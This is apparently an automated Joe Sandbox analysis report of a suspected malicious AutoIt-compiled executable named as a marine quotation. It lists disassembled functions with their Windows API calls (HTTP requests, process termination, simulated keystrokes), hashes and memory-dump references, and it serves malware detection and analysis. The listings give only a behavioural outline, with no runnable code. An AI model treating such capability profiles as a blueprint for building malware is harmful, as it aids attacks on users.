                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                            • String ID: close all
                                                                            • API String ID: 469580280-3243417748
                                                                            • Opcode ID: d3a4f19758c9e0ba21aaf3e3872e11479a2ba1daaababceabd7e1c778c77f82d
                                                                            • Instruction ID: 8c417c83dc779901ac33253be344cb22f0db9cd0f04abca3781e0b5ea036375c
                                                                            • Opcode Fuzzy Hash: d3a4f19758c9e0ba21aaf3e3872e11479a2ba1daaababceabd7e1c778c77f82d
                                                                            • Instruction Fuzzy Hash: 51D16B71701212CFDB29EF15C4A5B69F7A6BF06710F1482ADE44A6B352DB30AD12CF94
                                                                            Function 006A7DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006A7FAD
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006A7FC1
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 006A7FEB
                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 006A8005
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006A8017
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006A8060
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 006A80B0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectory$AttributesFile
                                                                            • String ID: *.*
                                                                            • API String ID: 769691225-438819550
                                                                            • Opcode ID: bff2d3d15a2a5d352b2da6999ca94aac420674b12dab03bbe01f391f0c6a3803
                                                                            • Instruction ID: 46e3d9c60edb627051499cdc7b6e32abcc40c756eb4f81eb5a8ba4d2d42f33d1
                                                                            • Opcode Fuzzy Hash: bff2d3d15a2a5d352b2da6999ca94aac420674b12dab03bbe01f391f0c6a3803
                                                                            • Instruction Fuzzy Hash: 8581AF725082459FCB24FF14C8449AAB3EABF8A310F144C6EF889D7251EB35DD498F92
                                                                            Function 00635BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00635C7A
                                                                              • Part of subcall function 00635D0A: GetClientRect.USER32(?,?), ref: 00635D30
                                                                              • Part of subcall function 00635D0A: GetWindowRect.USER32(?,?), ref: 00635D71
                                                                              • Part of subcall function 00635D0A: ScreenToClient.USER32(?,?), ref: 00635D99
                                                                            • GetDC.USER32 ref: 006746F5
                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00674708
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00674716
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0067472B
                                                                            • ReleaseDC.USER32(?,00000000), ref: 00674733
                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 006747C4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                            • String ID: U
                                                                            • API String ID: 4009187628-3372436214
                                                                            • Opcode ID: 0e2601072b06e06651135e08866effb70feb77c0907eb7f207e074ce9a559031
                                                                            • Instruction ID: 4a9fcd97c466792f1d390e0455f490e98aded9cbe6a838706f47c817c1611963
                                                                            • Opcode Fuzzy Hash: 0e2601072b06e06651135e08866effb70feb77c0907eb7f207e074ce9a559031
                                                                            • Instruction Fuzzy Hash: 3C71B031500205DFCF258F64C988AFA7BB7FF4A364F148269ED5A5A2A6CB31D842DF50
                                                                            Function 006A359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 006A35E4
                                                                            • LoadStringW.USER32(00702390,?,00000FFF,?), ref: 006A360A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: LoadString
                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                            • API String ID: 2948472770-2391861430
                                                                            • Opcode ID: c22ffadd52ee412982c324ee7ae077cc8fcf3c94253f879bfadd346cb514ba5a
                                                                            • Instruction ID: c2f44211927776a62a9184614480131dd060a022bd402991207b71798f1e8eb2
                                                                            • Opcode Fuzzy Hash: c22ffadd52ee412982c324ee7ae077cc8fcf3c94253f879bfadd346cb514ba5a
                                                                            • Instruction Fuzzy Hash: 29516171C00219BBDF55EBA0CC42EEDBB7AEF05300F549129F105722A1DB715A95DFA8
                                                                            Function 006AC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 006AC272
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006AC29A
                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 006AC2CA
                                                                            • GetLastError.KERNEL32 ref: 006AC322
                                                                            • SetEvent.KERNEL32(?), ref: 006AC336
                                                                            • InternetCloseHandle.WININET(00000000), ref: 006AC341
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                            • String ID:
                                                                            • API String ID: 3113390036-3916222277
                                                                            • Opcode ID: c9dc4a58a20ee73a6cef10d424fb4cbcce027754a8297c19a5a0a06140abaff0
                                                                            • Instruction ID: 9e5ddf47df7acc13e32508b2b585238e5ab9977a8075b72157db0fbd2451d895
                                                                            • Opcode Fuzzy Hash: c9dc4a58a20ee73a6cef10d424fb4cbcce027754a8297c19a5a0a06140abaff0
                                                                            • Instruction Fuzzy Hash: 7E316DB1500204AFDB21AF648888EBB7AFEEF4A764F14851EF44A92200DB34DD059F70
                                                                            Function 0069989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00673AAF,?,?,Bad directive syntax error,006CCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 006998BC
                                                                            • LoadStringW.USER32(00000000,?,00673AAF,?), ref: 006998C3
                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00699987
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadMessageModuleString
                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                            • API String ID: 2734547477-4153970271
                                                                            • Opcode ID: 70fecf94ee5d13b8861e48db8325286ae63d2e39bffadf112c1b3cd2ae123419
                                                                            • Instruction ID: 5fdc816176ab9951a6c420078564134e83f25f8d3b306cd72157f60e29a858a6
                                                                            • Opcode Fuzzy Hash: 70fecf94ee5d13b8861e48db8325286ae63d2e39bffadf112c1b3cd2ae123419
                                                                            • Instruction Fuzzy Hash: 30213C3284021AABDF15AF90CC06EEE777AFF18300F049459F519661A2EA719618DB64
                                                                            Function 0069209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetParent.USER32 ref: 006920AB
                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 006920C0
                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0069214D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameParentSend
                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                            • API String ID: 1290815626-3381328864
                                                                            • Opcode ID: 33ad7081fca0a167503000ddbd5f0ddd4a97ab07fe658f8083198db120c20f44
                                                                            • Instruction ID: 908449e8e804d70dd65ef5d6fb49620c2f29b071d4febbbf4e43368cbb333e3c
                                                                            • Opcode Fuzzy Hash: 33ad7081fca0a167503000ddbd5f0ddd4a97ab07fe658f8083198db120c20f44
                                                                            • Instruction Fuzzy Hash: 0811367668870BBAFE012221DC2BCF6379FCB05329F21005AFB05A55D5EE616C565618
                                                                            Function 006C50D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 006C5186
                                                                            • ShowWindow.USER32(?,00000000), ref: 006C51C7
                                                                            • ShowWindow.USER32(?,00000005,?,00000000), ref: 006C51CD
                                                                            • SetFocus.USER32(?,?,00000005,?,00000000), ref: 006C51D1
                                                                              • Part of subcall function 006C6FBA: DeleteObject.GDI32(00000000), ref: 006C6FE6
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 006C520D
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 006C521A
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 006C524D
                                                                            • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 006C5287
                                                                            • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 006C5296
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                            • String ID:
                                                                            • API String ID: 3210457359-0
                                                                            • Opcode ID: dfba55669e425a94e2ef7bb903d62308ace5dbaf866f997cd30c21b82c679eb0
                                                                            • Instruction ID: 47d6760dc4ab84cefa3408ba25b324da2dd1af2d9cf5e07cc0101bbf2eb1bd11
                                                                            • Opcode Fuzzy Hash: dfba55669e425a94e2ef7bb903d62308ace5dbaf866f997cd30c21b82c679eb0
                                                                            • Instruction Fuzzy Hash: 5C51A030A50A08BEEF209F24CC49FF97BA7EB05325F584119F516966E1C779BAC0DB40
                                                                            Function 00648B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00686890
                                                                            • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 006868A9
                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 006868B9
                                                                            • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 006868D1
                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 006868F2
                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00648874,00000000,00000000,00000000,000000FF,00000000), ref: 00686901
                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0068691E
                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00648874,00000000,00000000,00000000,000000FF,00000000), ref: 0068692D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                            • String ID:
                                                                            • API String ID: 1268354404-0
                                                                            • Opcode ID: cae1b63481f31e1a2b8d397953edeec2b329509bf30f23d70c525ef73bc79d26
                                                                            • Instruction ID: 912a6cd740fbd22ff2338d9ce5e4bf03ee78682817c2d98a66d4ae31a8139f3a
                                                                            • Opcode Fuzzy Hash: cae1b63481f31e1a2b8d397953edeec2b329509bf30f23d70c525ef73bc79d26
                                                                            • Instruction Fuzzy Hash: 73515870A00209EFDB20DF25CC55FAA7BB7EB58760F104618F956972E0DB70E991DB50
                                                                            Function 006AC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006AC182
                                                                            • GetLastError.KERNEL32 ref: 006AC195
                                                                            • SetEvent.KERNEL32(?), ref: 006AC1A9
                                                                              • Part of subcall function 006AC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 006AC272
                                                                              • Part of subcall function 006AC253: GetLastError.KERNEL32 ref: 006AC322
                                                                              • Part of subcall function 006AC253: SetEvent.KERNEL32(?), ref: 006AC336
                                                                              • Part of subcall function 006AC253: InternetCloseHandle.WININET(00000000), ref: 006AC341
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                            • String ID:
                                                                            • API String ID: 337547030-0
                                                                            • Opcode ID: 9f1af8f7e1b9719255151793b2d059b71999b25c73c918ff1e7322ce2ee8adeb
                                                                            • Instruction ID: e4250e4930e81d935e51987ee7b5f93bc9416e3708a06d952a21ef208903c37a
                                                                            • Opcode Fuzzy Hash: 9f1af8f7e1b9719255151793b2d059b71999b25c73c918ff1e7322ce2ee8adeb
                                                                            • Instruction Fuzzy Hash: 30318C71200605AFDB21AFA5DD44AB6BBFAFF5A320B04441EF95A82710D731EE15DFA0
                                                                            Function 006925A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00693A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00693A57
                                                                              • Part of subcall function 00693A3D: GetCurrentThreadId.KERNEL32 ref: 00693A5E
                                                                              • Part of subcall function 00693A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,006925B3), ref: 00693A65
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 006925BD
                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 006925DB
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 006925DF
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 006925E9
                                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00692601
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00692605
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 0069260F
                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00692623
                                                                            • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00692627
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                            • String ID:
                                                                            • API String ID: 2014098862-0
                                                                            • Opcode ID: b0c5ab0b4d41b2ee4996a1a368d4fe998532ea087526af77d8909cfcb822539f
                                                                            • Instruction ID: a6d2b105f9eb94615716949928a7aa619e6e458e2023abddf57ca13c2adc9eeb
                                                                            • Opcode Fuzzy Hash: b0c5ab0b4d41b2ee4996a1a368d4fe998532ea087526af77d8909cfcb822539f
                                                                            • Instruction Fuzzy Hash: DA01D430790220BBFB106769DC8AF693F5EDB4EB22F111005F318AE1D1C9E224449AA9
                                                                            Function 00691803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00691449,?,?,00000000), ref: 0069180C
                                                                            • HeapAlloc.KERNEL32(00000000,?,00691449,?,?,00000000), ref: 00691813
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00691449,?,?,00000000), ref: 00691828
                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00691449,?,?,00000000), ref: 00691830
                                                                            • DuplicateHandle.KERNEL32(00000000,?,00691449,?,?,00000000), ref: 00691833
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00691449,?,?,00000000), ref: 00691843
                                                                            • GetCurrentProcess.KERNEL32(00691449,00000000,?,00691449,?,?,00000000), ref: 0069184B
                                                                            • DuplicateHandle.KERNEL32(00000000,?,00691449,?,?,00000000), ref: 0069184E
                                                                            • CreateThread.KERNEL32(00000000,00000000,00691874,00000000,00000000,00000000), ref: 00691868
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                            • String ID:
                                                                            • API String ID: 1957940570-0
                                                                            • Opcode ID: 503a569fc5f28999a874c8c6e59bb117ae833d3585ba8e5fcb10fe26db0bddf3
                                                                            • Instruction ID: c550b02221e8c1eea311f2cdf180b947daf590424e2f2996c06aafe997e8b9f0
                                                                            • Opcode Fuzzy Hash: 503a569fc5f28999a874c8c6e59bb117ae833d3585ba8e5fcb10fe26db0bddf3
                                                                            • Instruction Fuzzy Hash: 3701CDB5240748BFE710AFB6DC4DF6B3BADEB89B11F055411FA09DB5A1CA749800DB20
                                                                            Function 006BA0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0069D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0069D501
                                                                              • Part of subcall function 0069D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0069D50F
                                                                              • Part of subcall function 0069D4DC: CloseHandle.KERNEL32(00000000), ref: 0069D5DC
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006BA16D
                                                                            • GetLastError.KERNEL32 ref: 006BA180
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006BA1B3
                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 006BA268
                                                                            • GetLastError.KERNEL32(00000000), ref: 006BA273
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006BA2C4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                            • String ID: SeDebugPrivilege
                                                                            • API String ID: 2533919879-2896544425
                                                                            • Opcode ID: 9f15428a3b8b4cb73aa9317833ca774918eac3e6136501f0702b48ea87cd8ef7
                                                                            • Instruction ID: 45b99aeb7245ca6f167215f43c4e2be4615d3260efd3fa2bba8741829a18602f
                                                                            • Opcode Fuzzy Hash: 9f15428a3b8b4cb73aa9317833ca774918eac3e6136501f0702b48ea87cd8ef7
                                                                            • Instruction Fuzzy Hash: D6619270204241AFD710DF59C494FA5BBE6AF44318F18849CF45A4BB93C772ED85CB92
                                                                            Function 0069BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0069BCFD
                                                                            • IsMenu.USER32(00000000), ref: 0069BD1D
                                                                            • CreatePopupMenu.USER32 ref: 0069BD53
                                                                            • GetMenuItemCount.USER32(00DC9AD8), ref: 0069BDA4
                                                                            • InsertMenuItemW.USER32(00DC9AD8,?,00000001,00000030), ref: 0069BDCC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
